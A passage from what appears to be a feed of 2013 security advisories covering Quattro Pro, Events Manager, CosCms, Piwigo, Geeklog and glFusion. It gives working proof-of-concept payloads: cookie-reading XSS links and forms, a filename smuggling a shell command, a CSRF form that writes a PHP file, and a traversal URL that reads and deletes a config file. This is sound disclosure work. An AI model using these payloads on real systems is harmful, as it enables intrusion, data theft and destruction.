malformed QPW file the EDX register will contain a null value. This destination pointer used to store the value of the AX register will be therefore invalid, which causes the application to crash instantly.<br /> <br /> Crash details:<br /> <font color=#606060>eax=04b11e00 ebx=00007020 ecx=000000f5 edx=00000000 esi=00000000 edi=04b10048<br /> eip=202e5925 esp=0012d9b0 ebp=0012e8e8 iopl=0 nv up ei pl zr na pe nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<br /> <br /> QPW160!QProGetNotebookWindowHandle+0x23cb85:<br /> 202e5925 6689048a mov word ptr [edx+ecx*4],ax ds:0023:000003d4=????</font><br /> <br /> <br /> 1.2 The second crash occurs in the <b>QPW160.dll</b> module at the <b>Ordinal132</b> function when the application tries to copy a buffer from ESI to EDI. Due to the abnormal QPW file the EDI register is not properly initialized, which causes the dereference of the EDI pointer to a null value. After this, the code is not able to catch the issue due to a lack of exception handling, forcing the application to crash immediately.<br /> <br /> Crash details:<br /> <font color=#606060>eax=00000000 ebx=00000000 ecx=00000002 edx=00000000 esi=04ca6c40 edi=00000000<br /> eip=20005a7d esp=0012d97c ebp=0012d988 iopl=0 nv up ei pl nz ac po cy<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213<br /> <br /> QPW160!Ordinal132+0x5a7d: 20005a7d f3a5 rep movs dword ptr es:[edi],dword ptr [esi]</font><br /> <br /> <br /> In order to exploit these vulnerabilities remotely, the attacker has to send a malicious file to the victim by email. In a web-based scenario, the attacker can host a malicious file on a website or WebDav share and trick the victim to download and open the file. <br /> <br /> As a PoC (Proof of Concept) two files "1.qpw" and "2.qpw" are <a href="https://www.htbridge.com/advisory/HTB23112-PoC.rar">provided</a>, which cause immediate application crash. Password for archive: ph77=!3=Lhttps://www.htbridge.com/advisory/HTB23112Thu, 07 Mar 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23139<b>Product:</b> Events Manager WordPress plugin v5.3.3<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> Marcus Sykes<br><b>Vendor Notification:</b> 2013-01-16 12:00:10<br><b>Public Disclosure:</b> March 6, 2013 <br><b>CVE Reference:</b> CVE-2013-1407<br> <b>CVSSv2 Base Score:</b> 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Events Manager WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks.<br /> <br /> <br /> 1) Multiple XSS vulnerabilities in Events Manager WordPress plugin: CVE-2013-1407<br /> <br /> 1.1 The vulnerability exists due to insufficient filtration of user-supplied data in "scope" HTTP GET parameter passed to "/index.php" script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color=#606060>http://[host]/?page_id=42&amp;scope=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E,%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <br /> <br /> 1.2 The vulnerability exists due to insufficient filtration of user-supplied data in "_wpnonce" HTTP GET parameter passed to "/wp-admin/edit.php" script. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> PoC (Proof-of-Concept) below uses "alert()" JavaScript function to display administrator's cookies: <br /> <br /> <font color=#606060>http://[host]/wp-admin/edit.php?post_type=event&amp;page=events-manager-bookings&amp;_wpnonce=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <br /> <br /> 1.3 The vulnerabilities exist due to insufficient filtration of user-supplied data in "user_name", "dbem_phone" and "user_email" HTTP GET parameters passed to "/index.php" script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> PoCs (Proof-of-Concept) below use the "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color=#606060>http://[host]/?event=1&amp;user_name=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <font color=#606060>http://[host]/?event=1&amp;dbem_phone=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <font color=#606060>http://[host]/?event=1&amp;user_email=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <br /> <br /> 1.4 The vulnerability exists due to insufficient filtration of user-supplied data in "booking_comment" HTTP POST parameter passed to "/index.php" script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/?event=1&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;askform&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;booking_comment&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;&lt;/<font color="#808000">textarea</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script&gt;</font>&quot;</font>/</font>&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <br /> Vulnerabilities 1.3 and 1.4 will work only against unauthorized (not logged-in) users. Successful exploitation of these vulnerabilities also requires that event with id = 1 has turned-on registration. <br /> https://www.htbridge.com/advisory/HTB23139Wed, 06 Mar 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23145<b>Product:</b> CosCms v1.721<br><b>Vulnerability Type:</b> OS Command Injection [CWE-78]<br><b>Risk level: </b>High <img src="https://www.htbridge.com/images/risk3.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://www.coscms.org<br><b>Vendor Notification:</b> 2013-02-13 12:03:23<br><b>Public Disclosure:</b> March 6, 2013 <br><b>CVE Reference:</b> CVE-2013-1668<br> <b>CVSSv2 Base Score:</b> 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, which can be exploited to execute arbitrary OS commands on web server where the vulnerable application is hosted.<br /> <br /> <br /> 1) OS Command Injection in CosCms: CVE-2013-1668<br /> <br /> Vulnerability exists due to insufficient validation of user-supplied input in "$_FILES['file']['name']" variable passed to "/gallery/upload/index" URL before using it in PHP "exec()" function. A remote attacker can send a specially crafted HTTP POST request containing a malicious filename, and execute arbitrary commands on the target system with privileges of the web server.<br /> <br /> The following PoC (Proof of Concept) code will write output of "ls -la" command into "/gallery/upload/file.txt" file. You can use any tool to send raw HTTP requests, e.g. telnet:<br /> <br /> <br /> <font color=#606060>POST /gallery/upload/index HTTP/1.1<br /> Content-Type: multipart/form-data; boundary=---------------------------21456260222104<br /> Content-Length: 970<br /> <br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;title&quot;<br /> <br /> 1<br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;image_add&quot;<br /> <br /> 1<br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;description&quot;<br /> <br /> 1<br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;tags&quot;<br /> <br /> <br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;MAX_FILE_SIZE&quot;<br /> <br /> 100000000<br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;APC_UPLOAD_PROGRESS&quot;<br /> <br /> 511ad0922b50f<br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1 &amp; ls -la &gt; file.txt&quot;<br /> Content-Type: application/octet-stream<br /> <br /> 1<br /> <br /> -----------------------------21456260222104<br /> Content-Disposition: form-data; name=&quot;submit&quot;<br /> <br /> Update<br /> -----------------------------21456260222104--</font><br /> <br /> <br /> Successful exploitation of this vulnerability requires an attacker to be logged-in and have privileges to upload files. User registration is disabled by default.<br /> https://www.htbridge.com/advisory/HTB23145Wed, 06 Mar 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23144<b>Product:</b> Piwigo v2.4.6<br><b>Vulnerability Type:</b> Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]<br><b>Risk level: </b>High <img src="https://www.htbridge.com/images/risk3.png" style='margin-bottom:4px;'><br /><b>Creater:</b> Piwigo project<br><b>Vendor Notification:</b> 2013-02-06 12:14:31<br><b>Public Disclosure:</b> February 27, 2013 <br><b>CVE References:</b> CVE-2013-1468, CVE-2013-1469<br> <b>CVSSv2 Base Scores:</b> 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform Сross-Site Request Forgery and Path Traversal attacks.<br /> <br /> <br /> 1) Сross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468<br /> <br /> The vulnerability exists due to insufficient verification of the HTTP request origin in "/admin.php" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.<br /> <br /> The following PoC (Proof of Concept) code creates a file "file.php" containing "phpinfo();", which can be later accessed via the http://[host]/file.php URL:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/admin.php?page=plugin-LocalFilesEditor&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;f1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">'edited_file'</font> <font color="#800080">value</font>=<font color="#FF00FF">'file.php'</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">'text'</font> <font color="#800080">value</font>=<font color="#FF00FF">' phpinfo(); '</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">'submit'</font> <font color="#800080">value</font>=<font color="#FF00FF">'1'</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.f1.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <br /> Successful exploitation requires that the "LocalFiles Editor" plugin is enabled (disabled by default).<br /> <br /> <br /> 2) Path Traversal in Piwigo: CVE-2013-1469<br /> <br /> The vulnerability exists due to insufficient filtration of user-supplied input in "dl" HTTP GET parameter passed to "/install.php" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:<br /> <br /> <font color=#606060>if (!empty($_GET['dl']) &amp;&amp; file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))<br /> {<br /> $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];<br /> ...<br /> echo file_get_contents($filename);<br /> ...<br /> }</font><br /> <br /> However, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for "C:/boot.ini" (or any existing file) and for "C:/any_non_existing_directory/../boot.ini" (in our case the non-existing directory in path is "/pwg_/"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. <br /> Important: after being read the file is deleted (if web server has write permission to it).<br /> <br /> <br /> The following PoC (Proof of Concept) code will display and delete the application's configuration file:<br /> <br /> <font color=#606060>http://piwigo/install.php?dl=/../../local/config/database.inc.php</font><br /> https://www.htbridge.com/advisory/HTB23144Wed, 27 Feb 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23143<b>Product:</b> Geeklog v1.8.2<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://www.geeklog.net<br><b>Vendor Notification:</b> 2013-02-06 11:48:53<br><b>Public Disclosure:</b> February 27, 2013 <br><b>CVE Reference:</b> CVE-2013-1470<br> <b>CVSSv2 Base Score:</b> 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered vulnerability in Geeklog that can be exploited to perform Cross-Site Scripting (XSS) attacks.<br /> <br /> <br /> 1) Cross-Site Scripting (XSS) in Geeklog: CVE-2013-1470<br /> <br /> The vulnerability exists due to insufficient filtration of user-supplied data in "calendar_type" HTTP POST parameter passed to "/calendar/index.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in his browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses the "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/submit.php?type=calendar&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;mode&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Submit&quot;</font>&gt;</font> <br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;calendar_type&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&quot;</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookie);<font color="#0000FF">&lt;/<font color="#808000">script&gt;</font>'</font>&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font>https://www.htbridge.com/advisory/HTB23143Wed, 27 Feb 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23142<b>Product:</b> glFusion v1.2.2<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://www.glfusion.org/<br><b>Vendor Notification:</b> 2013-01-30 13:05:55<br><b>Public Disclosure:</b> February 20, 2013 <br><b>CVE Reference:</b> CVE-2013-1466<br> <b>CVSSv2 Base Score:</b> 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks.<br /> <br /> glFusion has a "bad_behaviour" plugin (installed by default) that verifies HTTP Referer, aimed to protect against spambots. The plugin also makes reflected XSS attacks against the application a little bit more complex. To bypass the security restriction PoC (Proof-of-Concept) codes for vulnerabilities 1.1 – 1.3 modify the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1) . <br /> <br /> <br /> 1) Multiple Cross-Site Scripting (XSS) in glFusion: CVE-2013-1466<br /> <br /> 1.1 The vulnerability exists due to insufficient filtration of user-supplied data in "subject" HTTP POST parameter passed to "/profiles.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The PoC code below uses "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">meta</font> <font color="#800080">http-equiv</font>=<font color="#FF00FF">&quot;Content-Type&quot;</font> <font color="#800080">content</font>=<font color="#FF00FF">&quot;text/html; charset=utf-8&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> var x = 0<br /> function go2() { location.replace(&quot;&quot;) }<br /> function go() {<br /> if(x) return<br /> x += 1<br /> try {<br /> var html = '<font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">target</font>=<font color="#FF00FF">&quot;_parent&quot;</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/profiles.php&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;uid&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;2&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;author&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;author&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;message&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;message_html&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;authoremail&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;mail@mail.com&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;postmode&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;html&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;what&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;contact&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;subject&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font><font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font>'<br /> window.frames[0].document.body.innerHTML = html<br /> window.frames[0].document.forms[0].submit()<br /> } catch(e) {<br /> go2()<br /> }<br /> }<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">iframe</font> <font color="#800080">onload</font>=<font color="#FF00FF">&quot;window.setTimeout('</font>go()', 99)&quot; <font color="#800080">src</font>=<font color="#FF00FF">&quot;about:blank&quot;</font> <font color="#800080">style</font>=<font color="#FF00FF">&quot;visibility:hidden&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">iframe</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> window.setTimeout('go2()', 3333)<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font><br /> <br /> <br /> 1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in "address1", "address2", "calendar_type", "city", "state", "title", "url", "zipcode" HTTP POST parameters passed to "/calendar/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in user’s browser in context of the vulnerable website.<br /> <br /> The PoC code below uses "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">meta</font> <font color="#800080">http-equiv</font>=<font color="#FF00FF">&quot;Content-Type&quot;</font> <font color="#800080">content</font>=<font color="#FF00FF">&quot;text/html; charset=utf-8&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> var x = 0<br /> function go2() { location.replace(&quot;&quot;) }<br /> function go() {<br /> if(x) return<br /> x += 1<br /> try {<br /> var html = '<font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">target</font>=<font color="#FF00FF">&quot;_parent&quot;</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/calendar/index.php&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;mode&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Submit&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;savecal&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Submit&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;address1&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>' <br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;calendar_type&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;city&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;state&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;title&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;url&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;zipcode&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font>' <br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;address2&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(document.cookie);&quot;</font>\'&gt;</font><font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font>'<br /> window.frames[0].document.body.innerHTML = html<br /> window.frames[0].document.forms[0].submit()<br /> } catch(e) {<br /> go2()<br /> }<br /> }<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">iframe</font> <font color="#800080">onload</font>=<font color="#FF00FF">&quot;window.setTimeout('</font>go()', 99)&quot; <font color="#800080">src</font>=<font color="#FF00FF">&quot;about:blank&quot;</font> <font color="#800080">style</font>=<font color="#FF00FF">&quot;visibility:hidden&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">iframe</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> window.setTimeout('go2()', 3333)<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font><br /> <br /> <br /> 1.3 The vulnerabilities exists due to insufficient filtration of user-supplied data in "title" and "url" HTTP POST parameters passed to "/links/index.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The PoC code below uses "alert()" JavaScript function to display user's cookies: <br /> <br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">meta</font> <font color="#800080">http-equiv</font>=<font color="#FF00FF">&quot;Content-Type&quot;</font> <font color="#800080">content</font>=<font color="#FF00FF">&quot;text/html; charset=utf-8&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> var x = 0<br /> function go2() { location.replace(&quot;&quot;) }<br /> function go() {<br /> if(x) return<br /> x += 1<br /> try {<br /> var html = '<font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">target</font>=<font color="#FF00FF">&quot;_parent&quot;</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/links/index.php&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;mode&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Submit&quot;</font>&gt;</font>'<br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;title&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font color="#FF00FF">&quot;javascript:alert(1);&quot;</font>\'&gt;</font>' <br /> html += '<font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;url&quot;</font> value=\'&quot; <font color="#800080">onmouseover</font>=<font 